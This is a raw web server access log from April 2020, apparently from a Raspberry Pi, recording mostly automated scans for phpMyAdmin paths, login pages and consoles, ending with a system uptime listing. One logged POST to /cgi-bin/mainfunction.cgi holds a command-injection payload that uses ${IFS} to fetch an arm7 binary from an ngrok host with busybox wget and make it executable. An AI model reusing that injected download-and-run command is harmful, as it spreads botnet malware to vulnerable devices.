+0000] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:25 +0000] "GET /phpma/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:31 +0000] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:32 +0000] "GET /phpMyAbmin/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:32 +0000] "GET /phpMyAdmin__/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:33 +0000] "GET /phpMyAdmin+++---/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:39 +0000] "GET /phpMyAdm1n/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:40 +0000] "GET /shaAdmin/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:40 +0000] "GET /phpMyadmi/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:41 +0000] "GET /phpMyAdmion/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:43 +0000] "GET /MyAdmin/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:47 +0000] "GET /phpMyAdmin123/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:48 +0000] "GET /pwd/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:48 +0000] "GET /phpMyAdmina/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:49 +0000] "GET /phpMydmin/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:51 +0000] "GET /phpMyAdmin._/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:55 +0000] "GET /phpmyadmin2222/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:56 +0000] "GET /phpMyAdmin333/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:30:59 +0000] "GET /php2MyAdmin/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:03 +0000] "GET /phpNyAdmin/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:04 +0000] "GET /1/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:04 +0000] "GET /download/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:07 +0000] "GET /phpmadmin/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:08 +0000] "GET /321/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:09 +0000] "GET /123131/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:12 +0000] "GET /phpMyAdminn/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:12 +0000] "GET /phpMyAdminhf/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:13 +0000] "GET /sbb/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:19 +0000] "GET /phpMyAdmln/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:23 +0000] "GET /__phpMyAdmin/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:24 +0000] "GET /program/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:27 +0000] "GET /phppma/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:28 +0000] "GET /phpmy/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:28 +0000] "GET /mysql/admin/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:29 +0000] "GET /mysql/dbadmin/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:29 +0000] "GET /mysql/sqlmanager/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:31 +0000] "GET /mysql/mysqlmanager/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:32 +0000] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:39 +0000] "GET /SQL/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 49.232.40.196 - - [13/Apr/2020:20:31:40 +0000] "GET /websql/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" 103.145.12.53 - - [13/Apr/2020:21:16:48 +0000] "GET / HTTP/1.1" 200 25000 "" "libwww-perl/6.43" 37.54.48.252 - - [13/Apr/2020:23:07:14 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 103.212.90.25 - - [14/Apr/2020:00:06:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 35.233.105.134 - - [14/Apr/2020:01:03:29 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 94.140.114.17 - - [14/Apr/2020:01:55:41 +0000] "GET / HTTP/1.0" 200 25000 "" "Pandalytics/1.0 (https://domainsbot.com/pandalytics/)" 190.166.176.99 - - [14/Apr/2020:02:22:47 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" "" 190.166.176.99 - - [14/Apr/2020:02:22:47 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 192.241.237.227 - - [14/Apr/2020:02:32:16 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 61.219.11.153 - - [14/Apr/2020:02:44:51 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 72.44.25.94 - - [14/Apr/2020:03:49:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 80.50.123.230 - - [14/Apr/2020:04:13:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 159.89.16.121 - - [14/Apr/2020:04:36:40 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 85.193.73.163 - - [14/Apr/2020:04:45:48 +0000] "GET /login.action HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 85.193.73.163 - - [14/Apr/2020:04:45:49 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 85.193.73.163 - - [14/Apr/2020:04:45:49 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 85.193.73.163 - - [14/Apr/2020:04:45:50 +0000] "GET /horde/imp/test.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 85.193.73.163 - - [14/Apr/2020:04:45:50 +0000] "GET /login?from=0.000000 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 85.193.73.163 - - [14/Apr/2020:04:45:51 +0000] "GET /console HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 85.193.73.163 - - [14/Apr/2020:04:45:51 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 5.164.24.192 - - [14/Apr/2020:04:59:41 +0000] "GET /login.action HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 5.164.24.192 - - [14/Apr/2020:04:59:42 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 5.164.24.192 - - [14/Apr/2020:04:59:42 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 5.164.24.192 - - [14/Apr/2020:04:59:43 +0000] "GET /horde/imp/test.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 5.164.24.192 - - [14/Apr/2020:04:59:43 +0000] "GET /login?from=0.000000 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 5.164.24.192 - - [14/Apr/2020:04:59:44 +0000] "GET /console HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 5.164.24.192 - - [14/Apr/2020:04:59:44 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 87.97.35.255 - - [14/Apr/2020:06:24:24 +0000] "GET / HTTP/1.1" 400 0 "" "" 177.94.10.93 - - [14/Apr/2020:06:40:22 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 162.243.132.92 - - [14/Apr/2020:07:10:35 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 178.73.215.171 - - [14/Apr/2020:07:23:24 +0000] "GET / HTTP/1.0" 200 25000 "" "" 92.118.37.64 - - [14/Apr/2020:08:08:58 +0000] "GET / HTTP/1.0" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/75.0.3770.100 Safari/537.36" 188.15.136.91 - - [14/Apr/2020:08:29:30 +0000] "GET / HTTP/1.1" 400 0 "" "" 188.15.136.91 - - [14/Apr/2020:08:29:31 +0000] "GET / HTTP/1.1" 400 0 "" "" 188.15.136.91 - - [14/Apr/2020:08:29:32 +0000] "GET / HTTP/1.1" 400 0 "" "" 188.15.136.91 - - [14/Apr/2020:08:29:32 +0000] "GET / HTTP/1.1" 400 0 "" "" 188.15.136.91 - - [14/Apr/2020:08:29:32 +0000] "GET / HTTP/1.1" 400 0 "" "" 188.15.136.91 - - [14/Apr/2020:08:29:32 +0000] "GET / HTTP/1.1" 400 0 "" "" 188.15.136.91 - - [14/Apr/2020:08:29:32 +0000] "GET / HTTP/1.1" 400 0 "" "" 188.15.136.91 - - [14/Apr/2020:08:29:33 +0000] "GET / HTTP/1.1" 400 0 "" "" 188.15.136.91 - - [14/Apr/2020:08:29:34 +0000] "GET / HTTP/1.1" 400 0 "" "" 188.15.136.91 - - [14/Apr/2020:08:29:35 +0000] "GET / HTTP/1.1" 400 0 "" "" 188.15.136.91 - - [14/Apr/2020:08:29:36 +0000] "GET / HTTP/1.1" 400 0 "" "" 172.105.89.161 - - [14/Apr/2020:08:35:27 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 35.233.105.134 - - [14/Apr/2020:08:43:10 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 85.163.87.44 - - [14/Apr/2020:10:14:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 185.173.35.37 - - [14/Apr/2020:10:27:48 +0000] "GET / HTTP/1.1" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 103.193.173.217 - - [14/Apr/2020:10:32:55 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 80.82.68.67 - - [14/Apr/2020:10:44:50 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 80.82.68.67 - - [14/Apr/2020:10:44:51 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 80.82.68.67 - - [14/Apr/2020:10:44:52 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 185.198.0.168 - - [14/Apr/2020:10:47:18 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 85.27.186.144 - - [14/Apr/2020:10:56:17 +0000] "GET / HTTP/1.1" 200 25000 "" "" 45.5.36.177 - - [14/Apr/2020:11:12:08 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 185.202.2.226 - - [14/Apr/2020:12:11:31 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" Tue Apr 14 06:25:06 MDT 2020 06:25:06 up 49 days, 10:53, 1 user, load average: 0.44, 0.29, 0.28 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 49days 1:11m 2.34s /usr/bin/lxsession -s LXDE-pi -e LXDE